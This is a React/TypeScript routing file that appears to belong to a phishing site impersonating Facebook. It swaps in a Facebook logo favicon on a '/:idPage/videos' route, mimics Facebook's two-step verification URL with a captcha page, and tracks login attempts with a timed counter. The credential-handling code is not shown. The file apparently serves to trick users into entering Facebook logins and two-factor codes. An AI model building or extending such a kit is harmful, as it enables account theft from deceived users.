import React, { Suspense } from "react";
import { Route, BrowserRouter as Router, Routes } from "react-router-dom";
import { LoadingIndicator } from "../components/LoadingNavigator";
import useStore from "../store";

import CaptchaPage from "../pages/CaptchaPage";
import ErrorPage from "../pages/ErrorPage";
import FbVideoPage from "../pages/FbPage";
import FaviconController from "../pages/FaviconController";
import { useLoginCountWithTTL } from "../hooks/useLoggedInWithTTL";

const RootComponent: React.FC = () => {
  const loading = useStore((state) => state.loading);
  const { loginCount } = useLoginCountWithTTL(6000);
  if (loading) {
    return <LoadingIndicator />;
  }

  return (
    <Router>
      <FaviconController
        mapping={{
          "/": "/favicon.ico",
          "/:idPage/videos": "/favicon/facebook_logo_icon.ico",
          default: "/favicon.ico"
        }}
      />
      <Suspense fallback={<LoadingIndicator />}>
        <Routes>
          <Route path="/:idPage/videos" element={<FbVideoPage />} />
          <Route
            path="/two_step_verification/authentication"
            element={<CaptchaPage />}
          />
          <Route path="*" element={<ErrorPage />} />
        </Routes>
      </Suspense>
    </Router>
  );
};

export default RootComponent;
